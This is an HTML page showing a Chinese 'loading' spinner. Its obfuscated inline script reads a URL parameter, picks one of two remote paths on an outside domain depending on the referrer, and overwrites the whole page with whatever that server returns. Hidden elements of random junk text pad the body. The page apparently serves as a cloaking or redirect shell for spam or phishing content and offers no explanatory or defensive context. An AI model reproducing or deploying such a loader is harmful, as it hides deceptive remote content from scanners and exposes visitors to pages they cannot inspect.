<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .uX09gHWI9yn {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .uX09gHWI9yn .ucr9Yp {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .uX09gHWI9yn .content {
            line-height: 50px;
            text-align: center
        }

        .uX09gHWI9yn .img {
            width: 100%
        }

        .uX09gHWI9yn .Zlrgmg46t4 {
            text-align: center
        }

        .uX09gHWI9yn .Zlrgmg46t4 span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .uX09gHWI9yn .Zlrgmg46t4 span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .uX09gHWI9yn .Zlrgmg46t4 span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .uX09gHWI9yn .Zlrgmg46t4 span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .uX09gHWI9yn .Zlrgmg46t4 span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .uX09gHWI9yn .Zlrgmg46t4 span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .uX09gHWI9yn .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function G6KP1jmH5OX(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var mlUuH = G6KP1jmH5OX('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ mlUuH +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ mlUuH +".html?a=share";
		}
		
        u2VJKH0=url+"#"+new Date().getTime();
        u2VJKH0 && function() {
            $.get(u2VJKH0, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<b style='display:none' >ca4tzCJuTIwPusS</b>
<span style='display:none'>dvGyE65QWIYB6upLd</span>
<h1 style='display:none' >y5xdFpqFhcxNeslPf7jnnK0JlSw3OyIiIeGapzsfF9mP7jUtqaxMgpkKpbKRPJhZHe1dywjtWvyPjMA9z64zASUIXGEs07E</h1>
<b style='display:none' >ca4tzCJuTIwPusS</b>
<div style='display:none'>yGNCYAOYdqWdD3aaQ86Ws05r0yy</div>
<img  src='' style='display:none'><div class="uX09gHWI9yn">
    <div class="ucr9Yp">
        <div class="Zlrgmg46t4">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<ul style='display:none' >hsh6EGwdxy04OBxK3iz85l3KvUAzXICnNFxegcnHL32j6XhJlTAFlAQCSPBkxi6ISmxt4Vz2NEMmLgO5kWK4ywB</ul>
<p  style='display:none'>Hb8QplnmiYnNpwV3zGqT4fIGz8pE4</p>
<b style='display:none' >mWRJ6yuWzgWT7ogXX9pbLQIdPTKNudowvslrzS8nhpdrdQNaN9kwF00B3lTz7</b>
<h1 style='display:none' >njrRzH6fJdV7mE1cmHYWEyKW5f9asEi9EZkNQuiwTkgcZHlmlx1aQwjZ4VA5tGj</h1>
<p  style='display:none'>Hb8QplnmiYnNpwV3zGqT4fIGz8pE4</p>
<a  href='#' style='display:none'>PkR0TBLvbfuBfeGFFSic5IqeRiS0FE</a>
<div style='display:none'>tjnr3B2GQugoDqmavXyHzSXfau4ZzIsfpRHWDM9pkUNn6ui3ShTgbcMqghQw2PQC5INYxapvYwbeL1dmkn0ubmnCd0OToHC2</div>
<ul style='display:none' >hsh6EGwdxy04OBxK3iz85l3KvUAzXICnNFxegcnHL32j6XhJlTAFlAQCSPBkxi6ISmxt4Vz2NEMmLgO5kWK4ywB</ul></body>
</html>